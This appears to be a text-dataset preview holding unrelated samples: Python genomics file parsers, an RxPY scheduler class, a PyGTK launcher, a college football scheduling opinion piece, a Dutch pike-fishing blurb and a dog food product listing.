text
stringlengths 29
850k
|
|---|
import csv
import gzip
import logging
import mmap
import os
import sys
import textwrap
from collections import Counter, defaultdict
from itertools import groupby
from operator import itemgetter
import pandas as pd
import pyfaidx
from Bio import SeqIO
from Bio.SeqRecord import SeqRecord
from Bio.Seq import Seq
import clashchimeras
logger = logging.getLogger('root')
class GFF:
"""GFF file parser for mirbase gff3 file
This class uses memory-mapped file object to read a mirbase gff3 file. It
contains methods to read, process a gff3 file and return genomic coordinates
Attributes:
fileName: A mirbase gff3 file path
"""
def __init__(self, fileName=None):
self.features = {}
self.fileName = fileName
def read(self, featureType='miRNA_primary_transcript'):
"""Reads gff3 file provided during class initialization
Stores the byte positions of every feature in a dict object named
self.features
Keyword Args:
featureType: Feature type of a gff3 record, the third element of every
record in the file. Please change this if you want to store mature
form of microRNA, by default it uses primary transcript
(default 'miRNA_primary_transcript')
"""
logger.info('Reading %s' % self.fileName)
self.fileHandle = open(self.fileName, 'r+b')
bytePosition = self.fileHandle.tell()
for line in self.fileHandle:
row = line.decode('utf-8').rstrip().split("\t")
if not row[0].startswith("#") and row[2] == featureType:
attributes = row[-1].split(";")
for attribute in attributes:
if attribute.startswith('Name'):
mirbase_name = attribute.split("=")[-1]
self.features[mirbase_name] = bytePosition
bytePosition = self.fileHandle.tell()
self.fileHandle.close()
logger.debug('Reading %s finished' % self.fileName)
def process(self, name):
"""A method to return a Record object providing genomic information
Args:
name: A valid miRNA_primary_transcript name
Returns:
An object Record containing scaffold, start, end, strand, mirbase_id and
mirbase_name as its variables for access
"""
self.fileHandle = open(self.fileName, 'r+b')
self.mm = mmap.mmap(self.fileHandle.fileno(), 0)
self.mm.seek(self.features[name])
row = self.mm.readline().decode('utf-8').rstrip().split("\t")
attributes = row[-1].split(";")
for attribute in attributes:
if attribute.startswith("ID"):
_id = attribute.split("=")[-1]
elif attribute.startswith("Name"):
_name = attribute.split("=")[-1]
record = Record(scaffold=row[0], start=int(row[3]), end=int(row[4]),
strand=row[6], mirbase_id=_id, mirbase_name=_name)
self.fileHandle.close()
return record
def coordinates(self, name, start=None, end=None):
"""A method to return a bed record containing genomic coordinates for the
aligned segment
Keyword Args:
start: The alignment start position of the cDNA molecule or the relative
start of the particular molecule
end: The alignment end position in the cDNA molecule or the relative end
of the particular molecule
Args:
name: A valid miRNA_primary_transcript name
Returns:
A tuple of strings containing elements for a bed record
"""
record = self.process(name)
if not start and not end:
start = 1
end = record.end - record.start + 1
positions = {}
match_positions = []
if record.strand == '+':
_start = 1
for relative, actual in enumerate(range(record.start - 1, record.end),
start=_start):
positions[relative] = actual
for pos in range(start, end + 1):
match_positions.append(positions[pos])
return [(record.scaffold, min(match_positions), max(match_positions) + 1,
record.mirbase_name, 0, record.strand)]
elif record.strand == '-':
_start = 1
for relative, actual in enumerate(reversed(range(record.start - 1,
record.end)), start=_start):
positions[relative] = actual
for pos in range(start, end + 1):
match_positions.append(positions[pos])
return [(record.scaffold, min(match_positions), max(match_positions) + 1,
record.mirbase_name, 0, record.strand)]
class GTF:
"""GTF file parser for gencode gtf file
This class uses memory-mapped file object to read a gencode gtf file. It
contains methods to read, process a gtf file and return genomic coordinates
Attributes:
fileName: A gencode gtf file path
"""
def __init__(self, fileName=None):
self.features = defaultdict(list)
self.biotypeFeatures = defaultdict(list)
self.geneFeatures = defaultdict(list)
self.fileName = fileName
self.geneIds = {}
def readBiotype(self, featureType='exon', biotype=None):
logger.info('Reading %s' % self.fileName)
self.fileHandle = open(self.fileName, 'r+b')
for line in self.fileHandle:
row = line.decode('utf-8').rstrip().split("\t")
if not row[0].startswith("#") and row[2] == featureType:
attributes = row[-1].split("; ")
havana_transcript = '-'
havana_gene = '-'
exon_number = '0'
for attribute in attributes:
if attribute.startswith("transcript_id"):
transcript_id = attribute.split(" ")[-1][1:-1]
elif attribute.startswith("transcript_type"):
transcript_type = attribute.split(" ")[-1][1:-1]
elif attribute.startswith("exon_number"):
exon_number = int(attribute.split(" ")[-1])
elif attribute.startswith("havana_gene"):
havana_gene = attribute.split(" ")[-1][1:-1]
elif attribute.startswith("havana_transcript"):
havana_transcript = attribute.split(" ")[-1][1:-2]
elif attribute.startswith("gene_id"):
gene_id = attribute.split(" ")[-1][1:-1]
elif attribute.startswith("gene_name"):
gene_name = attribute.split(" ")[-1][1:-1]
elif attribute.startswith("transcript_name"):
transcript_name = attribute.split(" ")[-1][1:-1]
if biotype == 'tRNA':
if transcript_type == "tRNAscan":
self.biotypeFeatures[transcript_id].append((exon_number, row[0],
int(row[3]), int(row[4]),
row[6], gene_id,
havana_gene,
havana_transcript,
transcript_name,
gene_name))
else:
if transcript_type == biotype:
self.biotypeFeatures[transcript_id].append((exon_number, row[0],
int(row[3]), int(row[4]),
row[6], gene_id,
havana_gene,
havana_transcript,
transcript_name,
gene_name))
self.fileHandle.close()
def read(self, featureType='exon'):
"""Reads gtf file provided during class initialization
Stores the byte positions of every feature in a defaultdict(list) object
named self.features
Keyword Args:
featureType: Feature type of a gtf record, the third element of every
record in the file. Please change this if you want to get specific
records (e.g. 'UTR') (default 'exon')
"""
logger.info('Reading %s' % self.fileName)
self.fileHandle = open(self.fileName, 'r+b')
bytePosition = self.fileHandle.tell()
for line in self.fileHandle:
row = line.decode('utf-8').rstrip().split("\t")
if not row[0].startswith("#") and row[2] == featureType:
attributes = row[-1].split("; ")
for attribute in attributes:
if attribute.startswith("transcript_id"):
transcript_id = attribute.split(" ")[-1][1:-1]
self.features[transcript_id].append(bytePosition)
self.geneIds[transcript_id] = gene_id
if attribute.startswith("gene_id"):
gene_id = attribute.split(" ")[-1][1:-1]
bytePosition = self.fileHandle.tell()
self.fileHandle.close()
self.fileHandle = open(self.fileName, 'r+b')
bytePosition = self.fileHandle.tell()
for line in self.fileHandle:
row = line.decode('utf-8').rstrip().split("\t")
if not row[0].startswith("#") and row[2] == featureType:
attributes = row[-1].split("; ")
for attribute in attributes:
if attribute.startswith("gene_id"):
gene_id = attribute.split(" ")[-1][1:-1]
self.geneFeatures[gene_id].append(bytePosition)
bytePosition = self.fileHandle.tell()
self.fileHandle.close()
logger.debug('Reading %s finished' % self.fileName)
def process(self, name):
"""A method to return a Record object providing genomic information
Args:
name: A valid gencode transcript_id
Returns:
An object Record containing scaffold, start, end, strand, mirbase_id and
mirbase_name as its variables for access
"""
self.fileHandle = open(self.fileName, 'r+b')
self.mm = mmap.mmap(self.fileHandle.fileno(), 0)
positions = self.features[name]
for position in positions:
self.mm.seek(position)
row = self.mm.readline().decode('utf-8').rstrip().split("\t")
attributes = row[-1].split("; ")
_eid = '-'
_enb = '0'
for attribute in attributes:
if attribute.startswith("transcript_type"):
_tt = attribute.split(" ")[-1][1:-1]
elif attribute.startswith("transcript_id"):
_tid = attribute.split(" ")[-1][1:-1]
elif attribute.startswith("exon_id"):
_eid = attribute.split(" ")[-1][1:-1]
elif attribute.startswith("exon_number"):
_enb = int(attribute.split(" ")[-1])
elif attribute.startswith("gene_name"):
_gn = attribute.split(" ")[-1][1:-1]
record = Record(scaffold=row[0], start=int(row[3]), end=int(row[4]),
strand=row[6], transcript_type=_tt, transcript_id=_tid, exon_id=_eid,
exon_number=_enb, gene_name=_gn)
yield record
self.fileHandle.close()
def geneExonicRegions(self, df):
"""Given a DataFrame with the exon coordinates from Gencode for a single
gene, return the total number of coding regions in that gene.
"""
scaffold = df.iloc[0].scaffold
strand = df.iloc[0].strand
gene_type = df.iloc[0].gene_type
gene_id = df.iloc[0].gene_id
gene_name = df.iloc[0].gene_name
start = df.start.min()
end = df.end.max()
bp = [False] * (end - start + 1)
for i in range(df.shape[0]):
s = df.iloc[i]['start'] - start
e = df.iloc[i]['end'] - start + 1
bp[s:e] = [True] * (e - s)
regions = list(range(start, end + 1))
groups = []
for i, j in groupby(bp):
groups.append((i, len(list(j))))
e_start = 0
for i in groups:
e_end = e_start + i[1]
if i[0]:
record = Record(scaffold=scaffold, start=regions[e_start],
end=regions[e_end - 1], gene_type=gene_type, gene_id=gene_id,
gene_name=gene_name, strand=strand)
yield record
e_start += i[1]
def geneProcess(self, name):
"""A method to return a Record object providing genomic information
Args:
name: A valid gencode gene_id
Returns:
An object Record containing scaffold, start, end, strand, mirbase_id and
mirbase_name as its variables for access
"""
self.fileHandle = open(self.fileName, 'r+b')
self.mm = mmap.mmap(self.fileHandle.fileno(), 0)
positions = self.geneFeatures[name]
exons = []
for position in positions:
self.mm.seek(position)
row = self.mm.readline().decode('utf-8').rstrip().split("\t")
attributes = row[-1].split("; ")
for attribute in attributes:
if attribute.startswith("gene_type"):
_gt = attribute.split(" ")[-1][1:-1]
elif attribute.startswith("gene_id"):
_gid = attribute.split(" ")[-1][1:-1]
elif attribute.startswith("gene_name"):
_gn = attribute.split(" ")[-1][1:-1]
exons.append((row[0], int(row[3]), int(row[4]), row[6], _gt, _gid, _gn))
self.fileHandle.close()
exons_df = pd.DataFrame(exons, columns=['scaffold', 'start', 'end',
'strand', 'gene_type', 'gene_id', 'gene_name'])
for record in self.geneExonicRegions(exons_df):
yield record
def coordinates(self, name, start=None, end=None):
"""A generator to return a bed record containing genomic coordinates for the
aligned segment
Keyword Args:
start: The alignment start position of the cDNA molecule or the relative
start of the particular molecule
end: The alignment end position in the cDNA molecule or the relative end
of the particular molecule
Args:
name: A valid miRNA_primary_transcript name
Returns:
A list of tuple(s) of strings containing elements for a bed record. There
may be more than one because of alternate splicing.
"""
if "|" in name:
self.name = name.split("|")[0]
else:
self.name = name
positions = {}
match_positions = []
records = []
segments = []
result_segments = []
for record in self.process(self.name):
records.append(record)
records.sort(key=lambda x: int(x.exon_number))
if records[0].strand == '+':
_start = 1
for record in records:
for relative, actual in enumerate(range(record.start, record.end + 1),
start=_start):
positions[relative] = actual
_start = relative + 1
for pos in range(start, end):
match_positions.append(positions[pos])
for key, group in groupby(enumerate(match_positions),
lambda x: x[0] - x[-1]):
segment = list(map(itemgetter(1), group))
segments.append([segment[0], segment[-1]])
for segment in segments:
for record in records:
if segment[0] >= record.start and segment[1] <= record.end:
result_segments.append((record.scaffold, segment[0], segment[1],
record.transcript_id + '|' + record.gene_name, 0, record.strand))
elif records[0].strand == '-':
_start = 1
for record in records:
for relative, actual in enumerate(reversed(range(record.start,
record.end + 1)), start=_start):
positions[relative] = actual
_start = relative + 1
for pos in range(start, end):
match_positions.append(positions[pos])
for key, group in groupby(enumerate(reversed(match_positions)),
lambda x: x[0] - x[-1]):
segment = list(map(itemgetter(1), group))
segments.append([segment[0], segment[-1]])
for segment in segments:
for record in records:
if segment[0] >= record.start and segment[1] <= record.end:
result_segments.append((record.scaffold, segment[0], segment[1],
record.transcript_id + '|' + record.gene_name, 0, record.strand))
if len(result_segments) == 0:
logger.debug('%s, %s, %s' % (name, start, end))
logger.debug('%s' % str(segments))
for r in records:
logger.debug('%s %s %s %s' % (r.scaffold, r.strand,
r.start, r.end))
return result_segments
class SAM:
"""SAM file parser for parsing bowtie2 generated files
This class uses memory-mapped file object to read a sam file
Attributes:
fileName: A sam file path
"""
def __init__(self, fileName=None):
self.fileName = fileName
self.records = {}
def read(self, flag=0):
"""Reads sam file provided during class initialization
Stores the byte position of every record based on the keyword arg flag
provided, to a dict object named self.records
Keyword Args:
flag: The SAM alignment flag for a record. For default, it uses the
primary alignment for every record and ignores secondary alignments
(default 0)
"""
logger.info('Reading %s' % self.fileName)
self.fileHandle = open(self.fileName, 'r+b')
bytePosition = self.fileHandle.tell()
for line in self.fileHandle:
read = line.decode('utf-8').split("\t")
if not read[0].startswith("@") and read[1] == str(flag):
self.records[read[0]] = bytePosition
bytePosition = self.fileHandle.tell()
self.fileHandle.close()
logger.debug('Reading %s finished' % self.fileName)
def access(self, queryName):
"""Provides random access of a record from the sam file
Args:
queryName: The query name of the read from the sam file
Returns:
A list generated after splitting the record line from sam file
"""
self.fileHandle = open(self.fileName, 'r+b')
self.mm = mmap.mmap(self.fileHandle.fileno(), 0)
self.mm.seek(self.records[queryName])
row = self.mm.readline().decode('utf-8').rstrip().split("\t")
self.fileHandle.close()
return self.pretty(row)
def filterPotentialChimeras(self, min_length=30, flag=0, target=None):
"""Generated a filtered fasta file from a sam file
This filtered fasta file contains reads that can be potentially chimeras.
The criteria for filtering is based on the minimum length
Keyword Args:
min_length: To be selected as a potential chimera, this is the minimum
read length (default 30)
flag: The SAM alignment flag describing the type of alignment (default 0)
target: The prefix for output file
"""
logger.debug('Filtering {} for potential chimeras'.format(target))
target = '{}.filter.fasta'.format(target.rpartition(".")[0])
if os.path.exists(target):
logger.info('Skipping filtering for {}'.format(target))
else:
with open(target, 'w') as oH:
with open(self.fileName) as iH:
for row in csv.reader(iH, delimiter="\t"):
if not row[0].startswith('@') and row[1] == str(flag):
if len(row[9]) >= 30:
print(textwrap.fill('>%s' % row[0], width=80), file=oH)
print(textwrap.fill('%s' % row[9], width=80), file=oH)
logger.debug('Filtering finished')
return target
def pretty(self, row):
refId = row[2]
start = int(row[3])
for i in row[10:]:
if i.startswith('MD'):
mismatchInfo = i
sequence = row[9]
cigar = row[5]
cigarString = clashchimeras.methods.convertCigar(row[5])
matchLength = cigarString.count("M") + cigarString.count("D")
end = start + matchLength - 1
record = Record(refId=refId, start=start, mismatchInfo=mismatchInfo,
sequence=sequence, cigarString=cigarString, matchLength=matchLength,
cigar=cigar, end=end)
return record
class Output:
"""Contains methods for writing output files
This class is used to generate every kind of output generated by this
package which includes plain text, ansi colored text and bed file
Attributes:
target: A prefix for output file which will be automatically followed by
extension (default 'wip')
overlap: Minimum overlap to be set between two molecules when determining
chimera (default 4)
gap: Maximum gap (number of unknown nucleotides) to be allowed between
two molecules within a chimera (default 9)
"""
def __init__(self,
target=None,
smallRNABed=False,
targetRNABed=False,
overlap=4,
gap=9):
self.target = target
self.overlap = overlap
self.gap = gap
if smallRNABed:
self.smallRNABedHandle = open('{}.smallRNA.bed'.format(self.target), 'w')
print('# BED locations of smallRNA part of the identified chimera',
file=self.smallRNABedHandle)
self.smallRNABedCSV = csv.writer(self.smallRNABedHandle, delimiter="\t")
self.smallRNABedCSV.writerow(
['# The name field represents the following:'])
self.smallRNABedCSV.writerow(
['# E.g. 201980-1-48|hsa-mir-100==PAPSS1'])
self.smallRNABedCSV.writerow(
['# 201980-1-48 is the fasta identifier'])
self.smallRNABedCSV.writerow(
["# 201980 is the unique identifier"])
self.smallRNABedCSV.writerow(
["# 1 is the number of times that sequence was observed in raw "
"fastq "])
self.smallRNABedCSV.writerow(
["# 48 is the length of the sequence"])
self.smallRNABedCSV.writerow(
['# hsa-mir-100 represents the smallRNA transcript'])
self.smallRNABedCSV.writerow(
['# PAPSS1 represents the gene symbol for targetRNA transcript '
'transcript '])
if targetRNABed:
self.targetRNABedHandle = open('{}.targetRNA.bed'.format(self.target),
'w')
self.targetRNABedCSV = csv.writer(self.targetRNABedHandle, delimiter="\t")
self.targetRNABedCSV.writerow(
['# The name field represents the following:'])
self.targetRNABedCSV.writerow(
['# E.g. 136019-1-48|ENST00000375759.6|SPEN==hsa-mir-103a-2'])
self.targetRNABedCSV.writerow(
['# 136019-1-48 is the fasta identifier'])
self.targetRNABedCSV.writerow(
["# 136019 is the unique identifier"])
self.targetRNABedCSV.writerow(
["# 1 is the number of times that sequence was observed in raw "
"fastq "])
self.targetRNABedCSV.writerow(
["# 48 is the length of the sequence"])
self.targetRNABedCSV.writerow(
["# ENST00000375759.6 is the targetRNA transcript identifier"])
self.targetRNABedCSV.writerow(
['# SPEN is the gene symbol for for targetRNA transcript '
'ENST00000375759.6'])
self.targetRNABedCSV.writerow(
['# hsa-mir-103a-2 represents the smallRNA transcript '])
self.hybWriter = open('%s.chimeras.tsv' % self.target, 'w')
self.hybComments()
def hybComments(self):
print("# fasta Identifier: The identifier in <sample>.unique.fasta. ",
"#\tE.g. 123456-3-68 ",
"#\t123456 is the unique identifier",
"#\t3 is the number of times that sequence was observed in raw "
"fastq ",
"#\t68 is the length of the sequence", sep="\n", file=self.hybWriter)
print("# smallRNA: The cDNA ID of the type of RNA labelled as smallRNA in "
"the analysis",
"#\tE.g. hsa-let-7b (miRBase identifier)",
"#\tE.g. ENST00000619178.1|SNORD3D| (Gencode snoRNA identifier)",
sep="\n", file=self.hybWriter)
print("# smallRNA_start: cDNA alignment start position of the smallRNA "
"part of the chimera", file=self.hybWriter)
print("# smallRNA_MDtag: Showing the MD tag from the smallRNA SAM "
"alignment for the chimera",
"#\tSAM file format specification",
"#\thttp://samtools.github.io/hts-specs/SAMv1.pdf",
"#\tMD Z String for mismatching positions.Regex:[0-9]+((["
"A-Z]|\^[A-Z]+)[0-9]+)*9", sep="\n", file=self.hybWriter)
print('# smallRNA_cigar: Cigar string from the smallRNA SAM alignment for '
'the chimera',
"#\tSAM file format specification",
"#\thttp://samtools.github.io/hts-specs/SAMv1.pdf",
'#\tSee CIGAR in the file', sep="\n", file=self.hybWriter)
print('# arbitrary_chimera: The chimera representation indicating what '
'part of the sequence represents smallRNA and targetRNA',
'#\t{ is representing a match with smallRNA',
'#\t} is representing a match with targetRNA',
'#\t# is representing unaligned sequences (identified as --gap -ga)',
'#\t- is representing a deletion (D in cigar string)',
'#\t+ is representing a deletion (I in cigar string)',
'#\tE.g {{{{{{{{-{{{{{{{{{{{{{##}}}}}}}}}}+}}}}}}}}}}}}}}}}}}}}}}'
'#\tE.g The first 22 nucleotides are aligning to smallRNA cDNA',
'#\tE.g The last 33 nucleotides are aligning to targetRNA cDNA',
sep="\n", file=self.hybWriter)
print('# read_sequence: The actual sequence that is appeared in raw '
'reads', file=self.hybWriter)
print("# targetRNA: The cDNA ID of the type of RNA labelled as targetRNA "
"in "
"the analysis",
"#\tE.g. hsa-let-7b (miRBase identifier)",
"#\tE.g. ENST00000619178.1|SNORD3D| (Gencode snoRNA identifier)",
sep="\n", file=self.hybWriter)
print("# targetRNA_start: cDNA alignment start position of the targetRNA "
"part of the chimera", file=self.hybWriter)
print("# targetRNA_MDtag: Showing the MD tag from the targetRNA SAM "
"alignment for the chimera",
"#\tSAM file format specification",
"#\thttp://samtools.github.io/hts-specs/SAMv1.pdf",
"#\tMD Z String for mismatching positions.Regex:[0-9]+((["
"A-Z]|\^[A-Z]+)[0-9]+)*9", sep="\n", file=self.hybWriter)
print('# targetRNA_cigar: Cigar string from the targetRNA SAM alignment '
'for '
'the chimera',
"#\tSAM file format specification",
"#\thttp://samtools.github.io/hts-specs/SAMv1.pdf",
'#\tSee CIGAR in the file', sep="\n", file=self.hybWriter)
print("# fasta_Identifier", "smallRNA", "smallRNA_start", "smallRNA_MDtag",
"smallRNA_cigar", "arbitrary_chimera", "read_sequence", "targetRNA",
"targetRNA_start", "targetRNA_MDtag", "targetRNA_cigar", sep="\t",
file=self.hybWriter)
def writeTargetRNABed(self, query, targetRNASegments, smallRNA):
if "ENS" in smallRNA and "|" in smallRNA:
_smallRNA = smallRNA.split("|")[5]
else:
_smallRNA = smallRNA
for segment in targetRNASegments:
_segment = list(segment)
_segment[3] = query + "|" + _segment[3] + "==" + _smallRNA
self.targetRNABedCSV.writerow(_segment)
def writeSmallRNABed(self, query, smallRNASegments, targetRNA):
if "ENS" in targetRNA and "|" in targetRNA:
_targetRNA = targetRNA.split("|")[5]
else:
_targetRNA = targetRNA
for segment in smallRNASegments:
_segment = list(segment)
_segment[3] = query + "|" + _segment[3] + "==" + _targetRNA
self.smallRNABedCSV.writerow(_segment)
def write(self, queryName, smallRNA, targetRNA):
chimeraString = clashchimeras.methods.chimeraOrNot(smallRNA.cigarString,
targetRNA.cigarString, overlap=self.overlap, gap=self.gap)
smallRNARegion = clashchimeras.methods.findRegion(smallRNA)
targetRNARegion = clashchimeras.methods.findRegion(targetRNA)
print(queryName, smallRNARegion, smallRNA.start, smallRNA.mismatchInfo,
smallRNA.cigar, chimeraString, smallRNA.sequence,
targetRNARegion, targetRNA.start,
targetRNA.mismatchInfo, targetRNA.cigar, sep="\t", file=self.hybWriter)
def __del__(self):
self.hybWriter.close()
class Fasta:
def __init__(self, genome=None, gtf=None):
self.genome = genome
self.gtf = gtf
self.faidx = pyfaidx.Fasta(self.genome)
def getBiotype(self, output=None, biotype=None):
self.sequences = []
g = GTF(fileName=self.gtf)
if biotype == 'tRNA':
g.readBiotype(biotype=biotype, featureType='tRNAscan')
else:
g.readBiotype(biotype=biotype)
for transcript_id, exons in g.biotypeFeatures.items():
temp_seq = ''
exons.sort(key=itemgetter(0))
for exon in exons:
if exon[4] == '-':
temp_seq += (-self.faidx[exon[1]][exon[2] - 1:exon[3]]).seq
elif exon[4] == '+':
temp_seq += self.faidx[exon[1]][exon[2] - 1:exon[3]].seq
_id = '{}|{}|{}|{}|{}|{}|{}'.format(transcript_id,
exons[0][5],
exons[0][6],
exons[0][7],
exons[0][8],
exons[0][9],
len(temp_seq))
temp_rec = SeqRecord(seq=Seq(temp_seq), id=_id,
description='')
self.sequences.append(temp_rec)
if not output:
logger.error('Please provide output file..')
sys.exit()
else:
logger.info('Writing {}'.format(output))
SeqIO.write(self.sequences, output, 'fasta')
class Fastq:
def __init__(self, fileName=None, compressed=False):
self.fileName = fileName
self.compressed = compressed
self.n = 4
self.sequences = Counter()
self.uniqueOutput = fileName.rpartition(".")[0] + '.unique.fasta'
def recordIterator(self):
record = []
record_length = 0
for line in self.fileHandle:
if record_length == self.n:
yield record
record_length = 0
record = []
record.append(line.decode().rstrip())
record_length += 1
yield record
def createUnique(self):
if self.compressed:
self.fileHandle = gzip.open(self.fileName, 'rb')
else:
self.fileHandle = open(self.fileName, 'rb')
logger.info('Reading {}'.format(self.fileName))
for record in self.recordIterator():
self.sequences[record[1]] += 1
logger.info('Writing {}'.format(self.uniqueOutput))
with open(self.uniqueOutput, 'w') as wH:
for index, (sequence, counts) in enumerate(sorted(self.sequences.items(),
key=itemgetter(1), reverse=True), start=1):
print('>{}-{}-{}'.format(index, counts, len(sequence)), file=wH)
print(textwrap.fill(sequence, width=80), file=wH)
logger.debug('Finished writing {}'.format(self.uniqueOutput))
self.fileHandle.close()
class Record:
"""A custom object (preferred over dict) for easy access using variables
It's a dependency for GTF and GFF classes
"""
def __init__(self, **kwds):
self.__dict__.update(kwds)
|
Wefald’s proposal calls for all 30 of the Big 12’s non-conference games and for 30 of the Pac-12’s 36 out-of-league games to be played against each other.
The matchups would be spread evenly across the season (10 per month) with the winners of each conference meeting at the end of the regular season for a championship game, which would rotate between the Rose Bowl and AT&T Stadium.
The 10 Big 12 teams and 12 Pac-12 teams would create, kind of, one big conference. It’s not exactly like the BIG SUPERCONFERENCE ideas that so often come up in realignment chatter, but this would be a close relationship between two leagues.
If you don’t think too hard about it, it’s easy to see the merit behind the Pac-12 and Big 12 creating a scheduling deal.
Getting Pac-12 teams to regularly play in Texas and Big 12 teams to regularly play in California would be great for everyone’s recruiting. It’s a lot easier for a program to sell tickets to games against schools most fans have actually heard of. A long-term agreement would potentially make the future TV rights for both conferences more attractive (especially because the Pac-12 would get more inventory outside of the Pacific time zone).
The proposal fixes two bad ideas — a Pac-12 title game nobody watches, and a Big 12 title game that’s automatically a rematch and arguably hurts the league’s Playoff chances — and replaces them with a joint Pac-12/Big 12 title game that lots of people would watch. Washington State can’t lose to an FCS team if it isn’t allowed to play any FCS teams.
See? All of that makes tons of sense.
If you do think about it for a few minutes, the idea’s impossible to execute.
For one, just about every power conference team needs to play at least seven home football games to balance its books, so playing three power opponents out of conference is financially impossible, as Big 12 commissioner Bob Bowlsby notes in in Wilner’s article.
It’d be really hard for USC and Stanford to keep playing Notre Dame every year, or for Utah to keep playing BYU, or for anybody to keep dates with other big-name intersectional opponents (Texas would probably like to play scheduled games with Ohio State and Alabama, for example. And ESPN would probably like to broadcast them).
Head coaches would flip out, because they’d be forced to play dramatically harder schedules than their peers in the Big Ten, ACC, and (at least out of conference) SEC. The Playoff committee says it cares about strength of schedule but has shown it mainly cares about teams not losing, and all these teams would be at risk of more losses.
For as long as there’s a four-team playoff, that Pac-12/Big 12 title game is easily knocking one league out of contention every single year. And that assumes Pac-12 leader USC hasn’t already lost at Iowa State on a weeknight, which it probably has.
Screw it, though. This would be fun as hell. Look at all the fun matchups this kind of partnership would grant the college football world.
UCLA could play Kansas, with the winner’s basketball team advancing to the Sweet 16 automatically.
They could make Stanford fans go to either Ames or Morgantown every single year.
Colorado would to play some of its historical rivals again.
Utah could start a new Holy War with Baylor.
Wazzu-WVU would have 95 points, and their fans would consume all the alcohol within a three-state radius of either Pullman or Morgantown.
I mean, fine, Texas-USC games are usually pretty good.
The Pac-12 and the Big Ten actually agreed to a slimed-down version of this deal several years ago, before growing conference schedules and other logistical problems scuttled it.
If the Pac-12 wanted to pursue a smaller agreement with the Big 12 to get one game a season per team, or maybe even a little more, that’s probably doable, and it would have a positive effect on ticket sales TV rights sales.
Or the Pac-12 could try for another agreement with the Big Ten. The league could also reach out to BYU to formalize a limited number of games a season. The Cougars already play multiple Pac-12 teams a season, and given the high number of Latter-Day Saints in many Pac-12 markets, would have no problems selling tickets. There are lots of other incremental decisions the league could probably make to shore up its product for the future.
The Big 12 could pursue similar deals of its own. Maybe with SEC, where Nick Saban’s been advocating for years for Power 5 teams to only play each other?
But that’s boring, and Pac-12 football is already too boring.
Let’s get experimental and weird.
Will it work? Probably not! Is it smart? Probably not! But sign that paperwork anyway. The world demands more Stanford-West Virginia football.
|
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
from optparse import OptionParser
import gtk
from app import Application
from load import file_load
import data
import load
import save
def main():
usage = "usage: %prog [-c CRAPFILE] | [CRAPFILE]"
parser = OptionParser(usage)
(options, args) = parser.parse_args()
if len(args) > 1:
parser.error("incorrect number of arguments")
app = Application()
if len(args):
file_load(app.design, args[0])
app.show_app()
gtk.main()
else:
app.design.update()
app.show_app()
gtk.main()
if __name__ == '__main__':
try:
import psyco
psyco.full()
except ImportError:
pass
main()
|
Pike fishing in the polders surrounding Stolwijk is targeted at predatory fish species using spin, plug and flies. Using the fly fishing rod shallow water can be fished using streamers. In this typical Dutch polder countryside it is a great experience.
|
from abc import abstractmethod
from datetime import datetime
from typing import Optional
from rx.core import typing
from rx.disposable import Disposable, MultipleAssignmentDisposable
from .scheduler import Scheduler
class PeriodicScheduler(Scheduler, typing.PeriodicScheduler):
"""Base class for the various periodic scheduler implementations in this
package as well as the mainloop sub-package.
"""
def schedule_periodic(self,
period: typing.RelativeTime,
action: typing.ScheduledPeriodicAction,
state: Optional[typing.TState] = None
) -> typing.Disposable:
"""Schedules a periodic piece of work.
Args:
period: Period in seconds or timedelta for running the
work periodically.
action: Action to be executed.
state: [Optional] Initial state passed to the action upon
the first iteration.
Returns:
The disposable object used to cancel the scheduled
recurring action (best effort).
"""
disp: MultipleAssignmentDisposable = MultipleAssignmentDisposable()
seconds: float = self.to_seconds(period)
def periodic(scheduler: typing.Scheduler,
state: Optional[typing.TState] = None
) -> Optional[Disposable]:
if disp.is_disposed:
return None
now: datetime = scheduler.now
try:
state = action(state)
except Exception:
disp.dispose()
raise
time = seconds - (scheduler.now - now).total_seconds()
disp.disposable = scheduler.schedule_relative(time, periodic, state=state)
return None
disp.disposable = self.schedule_relative(period, periodic, state=state)
return disp
@abstractmethod
def schedule(self,
action: typing.ScheduledAction,
state: Optional[typing.TState] = None
) -> typing.Disposable:
"""Schedules an action to be executed.
Args:
action: Action to be executed.
state: [Optional] state to be given to the action function.
Returns:
The disposable object used to cancel the scheduled action
(best effort).
"""
return NotImplemented
@abstractmethod
def schedule_relative(self,
duetime: typing.RelativeTime,
action: typing.ScheduledAction,
state: Optional[typing.TState] = None
) -> typing.Disposable:
"""Schedules an action to be executed after duetime.
Args:
duetime: Relative time after which to execute the action.
action: Action to be executed.
state: [Optional] state to be given to the action function.
Returns:
The disposable object used to cancel the scheduled action
(best effort).
"""
return NotImplemented
@abstractmethod
def schedule_absolute(self,
duetime: typing.AbsoluteTime,
action: typing.ScheduledAction,
state: Optional[typing.TState] = None
) -> typing.Disposable:
"""Schedules an action to be executed at duetime.
Args:
duetime: Absolute time at which to execute the action.
action: Action to be executed.
state: [Optional] state to be given to the action function.
Returns:
The disposable object used to cancel the scheduled action
(best effort).
"""
return NotImplemented
|
Pro Pac Ultimates Chicken is formulated to be ideal for all breeds and sizes of dogs, providing a hearty, meat-based food with all the necessary nutrients. With chicken meat (one of the most natural meat sources for dogs) as the main ingredient (>20%), it is also combined with the benefits of whole grain rice (15%), and mixed fruits and vegetables (>12%). No artificial colours, flavours or preservatives. No by-products, corn, wheat, gluten or soy.
These have slightly damaged packaging and in some cases a loss of contents (as indicated). Food is in fine condition.
Chicken Meal (100% chicken meat), Brown Rice, White Rice, Rice Bran, Peas, Chicken Fat (Preserved with Mixed Tocopherols ), Beet Pulp, Flaxseed, Egg, Apples, Blueberries, Carrots, Spinach, Blueberry Fiber, Cranberry Fiber, DL-Methionine, L-Lysine, Taurine, Yucca, L-Carnitine, Beta-Carotene, Vitamins, Minerals.
Vitamin A 13.800 IU/kg, Vitamin D3 850 IU/kg, Vitamin C 35 mg/kg, Vitamin E (α-tocopherol) 100 IU/kg, Copper (copper sulfate) 20 mg/kg, Omega-6 >3.4%, Omega-3 >0.65%, Methionine 0.8 mg/kg, Lysine 1.1 mg/kg, Taurine 0.015%, L-Carnitine 15 mg/kg, Beta-Carotene 3 mg/kg.
